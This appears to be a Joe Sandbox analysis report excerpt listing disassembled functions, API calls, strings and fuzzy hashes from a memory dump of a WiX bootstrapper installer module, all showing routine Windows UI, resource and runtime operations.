GetLastError.KERNEL32(?,?,6C9C20B2,?,?,?,?,?,?,6C9DC000,?,00000009,?,?,?,6C9DC028), ref: 6C9C62F5

Strings

thmutil.cpp, xrefs: 6C9C631A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorItemLastTextWindow
String ID: thmutil.cpp
API String ID: 1272195076-2961750086
Opcode ID: 2541bb4cad72591494d086dd9072822614b192bab40fe9a13405c33d3ac4c7ed
Instruction ID: cd181246fd8cc58680b87e0b82f4c71355a60acfbbd4883ca76e503631aed9aa
Opcode Fuzzy Hash: 2541bb4cad72591494d086dd9072822614b192bab40fe9a13405c33d3ac4c7ed
Instruction Fuzzy Hash: 9BF05C72701A126FDB101FD1CC08F6B3FACDF00BA0B010024BA15EA911E634E800D7E2

Function 6C9C56D8 Relevance: 6.1, APIs: 4, Instructions: 68libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9C56FF
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C9C5714
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 6C9C5762
GetLastError.KERNEL32 ref: 6C9C576E

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem_memset
String ID:
API String ID: 1376650706-0
Opcode ID: 3e0f8b38d8653cf4037f9c6458daede84f7ecfdd912ab39d2ace819231608ed6
Instruction ID: ae526d76cd2475887bf15b94d625a197a01e5bd364f5c301d7674651b0fbab64
Opcode Fuzzy Hash: 3e0f8b38d8653cf4037f9c6458daede84f7ecfdd912ab39d2ace819231608ed6
Instruction Fuzzy Hash: 2C11E2B6701709ABDF10DFB48D48F8B37BCAF81B14F200174E924E7241EA34DA849B62

Function 6C9CAC36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66memoryfilewindowCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010,00000000,00000000,753CE860,?,6C9C7C00,?,00000000,?,00000000,00000000,00000000,ImageFile,00000000,00000000,ImageResource), ref: 6C9CAC61
GdipCreateBitmapFromFile.GDIPLUS(00000000,00000000,00000010,00000000,00000000,753CE860,?,6C9C7C00,?,00000000,?,00000000,00000000,00000000,ImageFile,00000000), ref: 6C9CAC7D

Strings

gdiputil.cpp, xrefs: 6C9CAC4D, 6C9CAC9E, 6C9CACC5

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFileFrom
String ID: gdiputil.cpp
API String ID: 2762118622-3769319569
Opcode ID: 8ec85bc85d54cd4ebb899883433e8f642585f99d66d138540e568bdda5a87045
Instruction ID: 3480534442a8bf5aaa742ad64213d02a574c3819bd0ff9f010321a7a4a635a8c
Opcode Fuzzy Hash: 8ec85bc85d54cd4ebb899883433e8f642585f99d66d138540e568bdda5a87045
Instruction Fuzzy Hash: AE112732781725ABD3215EA9C840F5A33A8AF90F64F11C505FD99AFB44CF30D80047A3

Function 6C9C41A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00004017,?,00000000,?), ref: 6C9C41BC
GetLastError.KERNEL32 ref: 6C9C41CC

Strings

WixStandardBootstrapperApplication.cpp, xrefs: 6C9C41F1

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: WixStandardBootstrapperApplication.cpp
API String ID: 1689873465-3796977662
Opcode ID: 96e32e8188e28ea59f99faff95669c6c59bf5f6fa36473d58ffda58227ab5b9b
Instruction ID: 3b2276888553e386adce210f1dc11a72d995c968f68b801a91c4a3fd0f08932a
Opcode Fuzzy Hash: 96e32e8188e28ea59f99faff95669c6c59bf5f6fa36473d58ffda58227ab5b9b
Instruction Fuzzy Hash: FEF0B47A700502BAE31086568C08EAB3EBCDBD2760F150038F941E3100E624DB059B72

Function 6C9C6EF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6C9C6F0B
GetLastError.KERNEL32 ref: 6C9C6F15

Strings

thmutil.cpp, xrefs: 6C9C6F3A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: thmutil.cpp
API String ID: 1948546556-2961750086
Opcode ID: 16cd3b76d0e0374df325891ed82f68668a615cdef315a26e4acbf865b088509c
Instruction ID: 951c60a4697bf8cb61428e9c1fb2299746c14873c3d4a30980a6a08c5419dda3
Opcode Fuzzy Hash: 16cd3b76d0e0374df325891ed82f68668a615cdef315a26e4acbf865b088509c
Instruction Fuzzy Hash: 94E0653371252A7BDB111ED2CC05BA73E18EF017A0F154174B944EA510D725D920EBE2

Function 6C9C8311 Relevance: 4.6, APIs: 3, Instructions: 85windowCOMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 6C9C8378
ShowWindow.USER32(?,?,?,00000000,?,?,6C9C3132,?,?,00000000,?,?), ref: 6C9C839A
SetFocus.USER32(00000000,?,00000000,?,?,6C9C3132,?,?,00000000,?), ref: 6C9C83EB

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CallbackDispatcherFocusShowUserWindow
String ID:
API String ID: 334017688-0
Opcode ID: 31100bccbb47d5a71d9235c367a65ff3dbdc3aa431d892698f8560362baf1063
Instruction ID: 40c782753a9095e2d8f2e6110d4478468952803e3c30e9da24361c2e2d823c6d
Opcode Fuzzy Hash: 31100bccbb47d5a71d9235c367a65ff3dbdc3aa431d892698f8560362baf1063
Instruction Fuzzy Hash: 3731AE70705204EFDB198F14C884AAE77B8FF05359F20A52AFD66A6E50D330E980CB5B

Function 6C9C77FF Relevance: 4.5, APIs: 3, Instructions: 40COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C9C780D
KiUserCallbackDispatcher.NTDLL(00000000,?), ref: 6C9C783B
ShowWindow.USER32(00000000,?), ref: 6C9C7850

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CallbackDispatcherItemShowUserWindow
String ID:
API String ID: 3248985991-0
Opcode ID: bd4402a432215d2473226f85716254fe7abe9d4d0b9d511084e1cee8d6c7e0dc
Instruction ID: c0d8e74a2c50643f2b2b16bfd337509bc91b6fc89513e36078264e44ae7be472
Opcode Fuzzy Hash: bd4402a432215d2473226f85716254fe7abe9d4d0b9d511084e1cee8d6c7e0dc
Instruction Fuzzy Hash: F5F0FC72701A545BC7114A6DCC84D9BBBBDEFC57243214519FB5697610C631E844C791

Function 6C9CAA8E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(6C9DC1F0,6C9DD0F4,6C9C7102,00000000,?,6C9C7102,6C9DC1F0,6C9DD0F4,6C9DD0EC), ref: 6C9CAA9B

Strings

gdiputil.cpp, xrefs: 6C9CAAAF

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: GdiplusStartup
String ID: gdiputil.cpp
API String ID: 2503201367-3769319569
Opcode ID: 72915e8c9e46dd3922173b85f59ac586163026c508cfee773c91fe4d3f1fd3ff
Instruction ID: 19d444d8a15c61573d5e13059a43e835a2bc73bdf940aba91c5be218b3dea2a3
Opcode Fuzzy Hash: 72915e8c9e46dd3922173b85f59ac586163026c508cfee773c91fe4d3f1fd3ff
Instruction Fuzzy Hash: B2D05E3264166977CB122AE6DC05DCF7F1EDF606B4B018510BA086AB50DB21D82097E3

Function 6C9CAA67 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(?), ref: 6C9CAA76
GdipFree.GDIPLUS(?,?), ref: 6C9CAA82

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Gdip$DisposeFreeImage
String ID:
API String ID: 1950503971-0
Opcode ID: 9c3d62b0cc038639358f22464bbae0ac284a827c4d92697c25cae6428d2a30fc
Instruction ID: d434c5bbc042c91481600f2087c40f1dd0eb0081179a1be53d318ed964d569f4
Opcode Fuzzy Hash: 9c3d62b0cc038639358f22464bbae0ac284a827c4d92697c25cae6428d2a30fc
Instruction Fuzzy Hash: 5ED02332100B9417C3115F8484017E6BBCC8F31254F01C015EE8061B10C7B1FC4087D1

Function 6C9CA674 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,6C9C42DB,?,?,00000000,?,00000000,?,6C9CB383,?,00000000), ref: 6C9CA688
RtlReAllocateHeap.NTDLL(00000000,?,6C9C42DB,?,?,00000000,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA68F

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 2612b8ef69c11ae8a76000d55064cff28d2c0231dc0f0c5e3bd5618e1d5d6fb9
Instruction ID: 05a72014c5e3e1c1810f9eaee677436cd2b67ad81e8485ac74359bf5b7bed0a8
Opcode Fuzzy Hash: 2612b8ef69c11ae8a76000d55064cff28d2c0231dc0f0c5e3bd5618e1d5d6fb9
Instruction Fuzzy Hash: 26D0C972294609BB8F016FB4CC09C9A7B6CEB162127108401F915E2100C639E1A09B60

Function 6C9C2843 Relevance: 1.5, APIs: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00008066,00000000,?), ref: 6C9C288B

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d101da6854346d345136d42070d05ee22b5643ca00abf5f6b20f7791ec191bde
Instruction ID: 4a06e8fa29408515a3d91ce584166c90a5c5140aed562e1056057a85087b177f
Opcode Fuzzy Hash: d101da6854346d345136d42070d05ee22b5643ca00abf5f6b20f7791ec191bde
Instruction Fuzzy Hash: D9F0E232300F10ABCF215A058858B8B77B9EBE1F29F10106DE65616A50CB72F455CB43

Function 6C9C2573 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00008068,00000000,?), ref: 6C9C25AE

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e7e91406a0ea708e2ea2d442b29021c911012c39c581da6be054c7a1285711cc
Instruction ID: f8270227714f7e1546e3273a2597fa0d43bed2a3ce03f91ae2497e3abb24a304
Opcode Fuzzy Hash: e7e91406a0ea708e2ea2d442b29021c911012c39c581da6be054c7a1285711cc
Instruction Fuzzy Hash: 4EE0D830348B84EFEB009E14C85DB4633A8BB14748F248539E509EE580E7F2D487C713

Function 6C9C6124 Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON

Download Yara Rule

APIs

IsDialogMessageW.USER32(?,?), ref: 6C9C6134

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: DialogMessage
String ID:
API String ID: 547518314-0
Opcode ID: b4642248624140837746e13f8a8773b5bcc48818f9e165c5a2a5b5e4a2046d31
Instruction ID: 4152e17713da6b0abd5bc75aec17ab14232a08694f16c419cd9399af47747275
Opcode Fuzzy Hash: b4642248624140837746e13f8a8773b5bcc48818f9e165c5a2a5b5e4a2046d31
Instruction Fuzzy Hash: B5C01231364608DB9B409E54DC04D66BBA8AB15701B504029B611C1412D622E920D752

Non-executed Functions

Function 6C9CA888 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

FindResourceExA.KERNEL32(00000000,0000000A,?,00000000), ref: 6C9CA898
GetLastError.KERNEL32(?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA8A4
LoadResource.KERNEL32(00000000,00000000,00000000,?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000), ref: 6C9CA8DD
GetLastError.KERNEL32(?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA8E9
SizeofResource.KERNEL32(00000000,00000000,?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000), ref: 6C9CA914
GetLastError.KERNEL32(?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA920
LockResource.KERNEL32(00000000,?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA948
GetLastError.KERNEL32(?,6C9CAAE9,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CA957

Strings

resrutil.cpp, xrefs: 6C9CA8C9, 6C9CA97C

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorLastResource$FindLoadLockSizeof
String ID: resrutil.cpp
API String ID: 2627587518-2883861530
Opcode ID: 044f323280b1ec9b4177a59575ee1fca0044ca8fd21f87effde3b2d60120a998
Instruction ID: a8cdae613852a8916ce65cf78419b427ad179058ef3d50c5d1b04604d6fbbec7
Opcode Fuzzy Hash: 044f323280b1ec9b4177a59575ee1fca0044ca8fd21f87effde3b2d60120a998
Instruction Fuzzy Hash: F721D372B46A17A7E7211AA58C19B473E68EF427A4F170134FD05FA650EF24CC0187E3

Function 6C9CBA63 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C9CCF42
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C9CCF57
UnhandledExceptionFilter.KERNEL32(6C9D7D1C), ref: 6C9CCF62
GetCurrentProcess.KERNEL32(C0000409), ref: 6C9CCF7E
TerminateProcess.KERNEL32(00000000), ref: 6C9CCF85

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71bb0b6c73cd07acbe62b0b19146e56abab52afb51221998227f43c7e5f8d2bd
Instruction ID: 682cfec9d4de197e7e3a1e215753533f8a759da7eb04007eb2830725d286ab04
Opcode Fuzzy Hash: 71bb0b6c73cd07acbe62b0b19146e56abab52afb51221998227f43c7e5f8d2bd
Instruction Fuzzy Hash: 1321B0B6609A84DFDF00DF69C5846487BB4FB0A304F60811AE60AB7750D7B0F9C18FA5

Function 6C9CE4E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C9DD198,6C9CBCE0,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CE4ED
__mtterm.LIBCMT ref: 6C9CE4F9

Part of subcall function 6C9CE1C4: DecodePointer.KERNEL32(00000008,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CE1D5
Part of subcall function 6C9CE1C4: TlsFree.KERNEL32(0000002A,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9CE1EF
Part of subcall function 6C9CE1C4: DeleteCriticalSection.KERNEL32(00000000,00000000,6C9D7D00,?,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9D0FCA
Part of subcall function 6C9CE1C4: _free.LIBCMT ref: 6C9D0FCD
Part of subcall function 6C9CE1C4: DeleteCriticalSection.KERNEL32(0000002A,6C9D7D00,?,6C9CBDA3,6C9CBD89,6C9DA0B8,00000008,?,6C9DA060,6C9DD198), ref: 6C9D0FF4

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C9CE50F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C9CE51C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C9CE529
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C9CE536
TlsAlloc.KERNEL32 ref: 6C9CE586
TlsSetValue.KERNEL32(00000000), ref: 6C9CE5A1
__init_pointers.LIBCMT ref: 6C9CE5AB
EncodePointer.KERNEL32 ref: 6C9CE5BC
EncodePointer.KERNEL32 ref: 6C9CE5C9
EncodePointer.KERNEL32 ref: 6C9CE5D6
EncodePointer.KERNEL32 ref: 6C9CE5E3
DecodePointer.KERNEL32(Function_0000E348), ref: 6C9CE604
__calloc_crt.LIBCMT ref: 6C9CE619
DecodePointer.KERNEL32(00000000), ref: 6C9CE633
GetCurrentThreadId.KERNEL32 ref: 6C9CE645

Strings

FlsSetValue, xrefs: 6C9CE51E
KERNEL32.DLL, xrefs: 6C9CE4E8
FlsFree, xrefs: 6C9CE52B
FlsGetValue, xrefs: 6C9CE511
FlsAlloc, xrefs: 6C9CE509

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: d299e6ff5b2e9d856d925c826f1bd5f879378fed9cf4b40204a6ad7ec0460779
Instruction ID: 9588e222e02481166d08438a4c729357e39d67c6bed9c564bdb6fb676848e472
Opcode Fuzzy Hash: d299e6ff5b2e9d856d925c826f1bd5f879378fed9cf4b40204a6ad7ec0460779
Instruction Fuzzy Hash: 3E315172B09A129ACF109F75CD49A193BB8EB422557310516E426B77E0EB30F480CFE2

Function 6C9C63C3 Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 305windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00000000), ref: 6C9C650A
GetLastError.KERNEL32 ref: 6C9C6517
SysFreeString.OLEAUT32(00000000), ref: 6C9C6745

Strings

thmutil.cpp, xrefs: 6C9C6712
SourceX, xrefs: 6C9C6612
sid, xrefs: 6C9C66D5
IconResource, xrefs: 6C9C64D3
FontId, xrefs: 6C9C648E
IconFile, xrefs: 6C9C6558
StringId, xrefs: 6C9C66C0
Window|Application|App|a, xrefs: 6C9C63DD
HexStyle, xrefs: 6C9C6684
Height, xrefs: 6C9C6449
Width, xrefs: 6C9C6404
SourceY, xrefs: 6C9C664A

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFreeIconLastLoadString
String ID: FontId$Height$HexStyle$IconFile$IconResource$SourceX$SourceY$StringId$Width$Window|Application|App|a$sid$thmutil.cpp
API String ID: 3871232939-637226125
Opcode ID: dc23bdc4e9a62ca0549777120542c2e39ab7ad1372762601dabfbaa170c51211
Instruction ID: bbb98afcc56b8f34d9990a8ee4db298b0366f72b891ff04c64fdfa284321ee2a
Opcode Fuzzy Hash: dc23bdc4e9a62ca0549777120542c2e39ab7ad1372762601dabfbaa170c51211
